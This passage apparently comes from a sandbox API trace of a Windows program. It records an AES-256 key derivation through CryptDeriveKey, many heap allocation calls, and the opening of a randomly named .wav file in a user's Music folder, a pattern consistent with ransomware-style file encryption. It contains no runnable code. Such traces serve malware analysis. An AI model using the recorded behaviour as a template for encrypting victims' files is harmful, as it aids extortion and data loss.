cchWideChar=15, lpMultiByteStr=0x43cac10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0115.423] CryptDeriveKey (in: hProv=0x41a48c0, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac740) returned 1 [0115.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0115.423] CryptDestroyHash (hHash=0x41ac180) returned 1 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0115.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0115.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0115.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0115.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0115.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0115.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0115.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0115.425] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0115.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0115.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.428] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0115.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0115.428] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0115.428] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0115.428] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\g4kpqwyzsqa5pz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0115.429] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.429] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.430] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0115.430] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0115.430] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0115.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, 